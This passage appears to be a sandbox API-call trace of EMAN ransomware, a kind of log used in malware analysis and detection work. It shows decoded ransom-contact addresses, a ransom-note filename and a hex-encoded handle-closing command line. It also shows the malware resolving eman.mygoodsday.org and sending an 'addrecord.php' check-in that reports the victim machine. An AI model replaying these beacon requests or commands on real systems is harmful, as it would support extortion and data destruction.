lpWideCharStr="\x31\x30\xfce0\x19\x44\x4f\x20\x28\x5b\x48\x4e\x5d\x20\x2d\x61\x63\x63\x65\x70\x74\x65\x75\x6c\x61\x20\x2d\x63\x20\x25\x25\x4a\x20\x2d\x79\x20\x2d\x70\x20\x25\x25\x49\x20\x2d\x6e\x6f\x62\x61\x6e\x6e\x65\x72\x29") returned 2 [0196.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e40, dwCreationFlags=0x4, lpThreadId=0x2413bb4 | out: lpThreadId=0x2413bb4*=0xfd0) returned 0x290 [0196.134] SetThreadPriority (hThread=0x290, nPriority=0) returned 1 [0196.134] ResumeThread (hThread=0x290) returned 0x1 [0196.134] Sleep (dwMilliseconds=0x19) [0196.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e30, dwCreationFlags=0x4, lpThreadId=0x2414224 | out: lpThreadId=0x2414224*=0xfd4) returned 0x29c [0196.169] SetThreadPriority (hThread=0x29c, nPriority=0) returned 1 [0196.169] ResumeThread (hThread=0x29c) returned 0x1 [0196.169] Sleep (dwMilliseconds=0x19) [0196.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x2414894 | out: lpThreadId=0x2414894*=0xfe4) returned 0x2a0 [0196.268] SetThreadPriority (hThread=0x2a0, nPriority=0) returned 1 [0196.268] ResumeThread (hThread=0x2a0) returned 0x1 [0196.268] Sleep (dwMilliseconds=0x19) [0196.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e40, dwCreationFlags=0x4, lpThreadId=0x2414f04 | out: lpThreadId=0x2414f04*=0xfe8) returned 0x288 [0196.352] SetThreadPriority (hThread=0x288, nPriority=0) returned 1 [0196.352] ResumeThread (hThread=0x288) returned 0x1 [0196.352] Sleep (dwMilliseconds=0x19) [0196.500] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e30, dwCreationFlags=0x4, lpThreadId=0x2415574 | out: lpThreadId=0x2415574*=0xff4) returned 0x298 [0196.501] SetThreadPriority (hThread=0x298, nPriority=0) returned 1 [0196.501] ResumeThread (hThread=0x298) returned 0x1 [0196.501] Sleep (dwMilliseconds=0x19) [0196.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e10, dwCreationFlags=0x4, lpThreadId=0x2415be4 | out: lpThreadId=0x2415be4*=0xff8) returned 0x254 [0196.544] SetThreadPriority (hThread=0x254, nPriority=0) returned 1 [0196.544] ResumeThread (hThread=0x254) returned 0x1 [0196.544] Sleep (dwMilliseconds=0x19) [0196.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0df0, dwCreationFlags=0x4, lpThreadId=0x2416254 | out: lpThreadId=0x2416254*=0xffc) returned 0x2a8 [0196.718] SetThreadPriority (hThread=0x2a8, nPriority=0) returned 1 [0196.718] ResumeThread (hThread=0x2a8) returned 0x1 [0196.718] Sleep (dwMilliseconds=0x19) [0197.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e50, dwCreationFlags=0x4, lpThreadId=0x24168c4 | out: lpThreadId=0x24168c4*=0xc18) returned 0x2b4 [0197.012] SetThreadPriority (hThread=0x2b4, nPriority=0) returned 1 [0197.012] ResumeThread (hThread=0x2b4) returned 0x1 [0197.012] Sleep (dwMilliseconds=0x19) [0197.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e40, dwCreationFlags=0x4, lpThreadId=0x2416f34 | out: lpThreadId=0x2416f34*=0x114) returned 0x2c0 [0197.158] SetThreadPriority (hThread=0x2c0, nPriority=0) returned 1 [0197.158] ResumeThread (hThread=0x2c0) returned 0x1 [0197.158] Sleep (dwMilliseconds=0x19) [0199.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e20, dwCreationFlags=0x4, lpThreadId=0x2417c14 | out: lpThreadId=0x2417c14*=0xdb0) returned 0x2c4 [0199.294] SetThreadPriority (hThread=0x2c4, nPriority=0) returned 1 [0199.294] ResumeThread (hThread=0x2c4) returned 0x1 [0199.294] Sleep (dwMilliseconds=0x19) [0199.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e20, dwCreationFlags=0x4, lpThreadId=0x2418284 | out: lpThreadId=0x2418284*=0x768) returned 0x2e0 [0199.674] SetThreadPriority (hThread=0x2e0, nPriority=0) returned 1 [0199.674] ResumeThread (hThread=0x2e0) returned 0x1 [0199.674] Sleep (dwMilliseconds=0x19) [0199.805] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fc8b2c, cbMultiByte=16, lpWideCharStr=0x19eb38, cchWideChar=2047 | out: lpWideCharStr="EncodeMan@qq.com[HN] -accepteula -c %%J -y -p %%I -nobanner)") returned 16 [0199.805] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fba7a4, cbMultiByte=4, lpWideCharStr=0x19eb34, cchWideChar=2047 | out: lpWideCharStr="EMANcodeMan@qq.com[HN] -accepteula -c %%J -y -p %%I -nobanner)") returned 4 [0199.805] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e40, dwCreationFlags=0x4, lpThreadId=0x1f8fd04 | out: lpThreadId=0x1f8fd04*=0xdc4) returned 0x2e4 [0199.806] SetThreadPriority (hThread=0x2e4, nPriority=0) returned 1 [0199.806] ResumeThread (hThread=0x2e4) returned 0x1 [0199.806] Sleep (dwMilliseconds=0x19) [0199.903] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fc8b2c, cbMultiByte=16, lpWideCharStr=0x19eb48, cchWideChar=2047 | out: lpWideCharStr="EncodeMan@qq.comcepteula -c %%J -y -p %%I -nobanner)") returned 16 [0199.903] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fcfe4c, cbMultiByte=24, lpWideCharStr=0x19eb44, cchWideChar=2047 | out: lpWideCharStr="EncodeMan@protonmail.comla -c %%J -y -p %%I -nobanner)") returned 24 [0199.903] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fc8b2c, cbMultiByte=22, lpWideCharStr=0x19eb40, cchWideChar=2047 | out: lpWideCharStr="EncodeMan@tutanota.com.comla -c %%J -y -p %%I -nobanner)") returned 22 [0199.903] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fe54dc, cbMultiByte=37, lpWideCharStr=0x19eb3c, cchWideChar=2047 | out: lpWideCharStr="BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm -y -p %%I -nobanner)") returned 37 [0199.903] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1fc8b2c, cbMultiByte=17, lpWideCharStr=0x19eb1c, cchWideChar=2047 | out: lpWideCharStr="#README_EMAN#.rtfM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm -y -p %%I -nobanner)") returned 17 [0199.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4084dc, lpParameter=0x1fc0e50, dwCreationFlags=0x4, lpThreadId=0x1f6fff4 | out: lpThreadId=0x1f6fff4*=0xddc) returned 0x2dc [0199.904] SetThreadPriority (hThread=0x2dc, nPriority=0) returned 1 [0199.904] ResumeThread (hThread=0x2dc) returned 0x1 [0199.904] Sleep (dwMilliseconds=0x19) [0199.950] WaitForMultipleObjects (nCount=0xd, lpHandles=0x4ee250*=0x290, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 6 os_tid = 0xb0 Thread: id = 7 os_tid = 0x57c Thread: id = 8 os_tid = 0xb68 [0073.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0073.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc8604, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0073.951] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x2001c8c, cbMultiByte=25, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="Host: eman.mygoodsday.org") returned 25 [0074.487] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0074.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1fba084, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0074.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0074.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc862c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0074.488] getaddrinfo (in: pNodeName="eman.mygoodsday.org", pServiceName="80", pHints=0x248fb84*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x248fba4 | out: ppResult=0x248fba4*=0x2c1b28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcc30*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) returned 0 [0078.300] FreeAddrInfoW (pAddrInfo=0x2c1b28*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcc30*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) [0078.301] getnameinfo (in: pSockaddr=0x248fc0c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), SockaddrLength=0x10, pNodeBuffer=0x1f23f4c, NodeBufferSize=0x401, pServiceBuffer=0x1fe4fd4, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="104.218.120.192", pServiceBuffer="80") returned 0 [0078.541] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c2c, cbMultiByte=15, lpWideCharStr=0x248ec28, cchWideChar=2047 | out: lpWideCharStr="104.218.120.192瞜F") returned 15 [0078.670] htons (hostshort=0x5000) returned 0x50 [0078.670] socket (af=2, type=1, protocol=6) returned 0x280 [0078.671] connect (s=0x280, name=0x248fcd0*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=16) returned 0 [0078.695] getsockname (in: s=0x280, name=0x1f5f500, namelen=0x248fc9c | out: name=0x1f5f500*(sa_family=2, sin_port=0xc112, sin_addr="192.168.0.96"), namelen=0x248fc9c) returned 0 [0078.695] getpeername (in: s=0x280, name=0x1f5f51c, namelen=0x248fc9c | out: name=0x1f5f51c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=0x248fc9c) returned 0 [0078.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=229, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 229 [0078.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=229, lpMultiByteStr=0x1f4600c, cbMultiByte=229, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=START HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", lpUsedDefaultChar=0x0) returned 229 [0078.695] send (in: s=0x280, buf=0x1f4600c*, len=229, flags=0 | out: buf=0x1f4600c*) returned 229 [0078.696] QueryPerformanceFrequency (in: lpFrequency=0x248fcc4 | out: lpFrequency=0x248fcc4) returned 1 [0078.696] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcbc | out: lpPerformanceCount=0x248fcbc*=12615862391) returned 1 [0078.696] Sleep (dwMilliseconds=0x0) [0078.702] ioctlsocket (in: s=0x280, cmd=1074030207, argp=0x248fc9c | out: argp=0x248fc9c) returned 0 [0078.702] select (in: nfds=641, readfds=0x248fb90, writefds=0x0, exceptfds=0x0, timeout=0x248fb88 | out: readfds=0x248fb90, writefds=0x0, exceptfds=0x0) returned 1 [0078.851] ioctlsocket (in: s=0x280, cmd=1074030207, argp=0x248fc9c | out: argp=0x248fc9c) returned 0 [0078.851] recv (in: s=0x280, buf=0x1f23f4c, len=178, flags=0 | out: buf=0x1f23f4c*) returned 178 [0078.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c2c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OK") returned 15 [0078.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c2c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OK") returned 15 [0078.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c2c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OK") returned 15 [0078.851] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.852] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631421894) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c2c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx1 200 OK") returned 13 [0078.852] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.852] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631438915) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe4fd4, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:35 GMT") returned 35 [0078.852] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.852] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631463374) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8604, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:35 GMT") returned 23 [0078.852] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.852] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631486236) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8604, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/html03:04:35 GMT") returned 18 [0078.852] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.852] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631501975) returned 1 [0078.852] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8604, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-alivel03:04:35 GMT") returned 22 [0078.853] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.853] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631525767) returned 1 [0078.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fcf63c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:35 GMT") returned 24 [0078.853] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0078.853] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=12631541303) returned 1 [0078.853] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.853] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x1fb2d2c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Server: nginx", lpUsedDefaultChar=0x0) returned 13 [0078.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2d2c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:04:35 GMT") returned 13 [0078.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2d2c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:04:35 GMT") returned 13 [0078.853] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0078.853] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x1fb2c4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SERVER: NGINX", lpUsedDefaultChar=0x0) returned 13 [0078.853] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c4c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:35 GMT") returned 13 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c4c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:35 GMT") returned 13 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c4c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:35 GMT") returned 13 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb2c4c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:35 GMT") returned 13 [0078.854] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:35 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.854] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:35 GMT", cchWideChar=35, lpMultiByteStr=0x1fde38c, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Date: Wed, 03 Oct 2018 03:04:35 GMT", lpUsedDefaultChar=0x0) returned 35 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:35 GMT") returned 35 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:35 GMT") returned 35 [0078.854] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.854] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT", cchWideChar=35, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATE: WED, 03 OCT 2018 03:04:35 GMT", lpUsedDefaultChar=0x0) returned 35 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT") returned 35 [0078.854] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT") returned 35 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT") returned 35 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:35 GMT") returned 35 [0078.855] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0078.855] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x1fde38c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Type: text/html", lpUsedDefaultChar=0x0) returned 23 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:35 GMT") returned 23 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:35 GMT") returned 23 [0078.855] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0078.855] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-TYPE: TEXT/HTML", lpUsedDefaultChar=0x0) returned 23 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:35 GMT") returned 23 [0078.855] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:35 GMT") returned 23 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:35 GMT") returned 23 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:35 GMT") returned 23 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:04:35 GMT") returned 23 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x1fde38c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Length: 12", lpUsedDefaultChar=0x0) returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:35 GMT") returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=18, lpWideCharStr=0x248ed24, 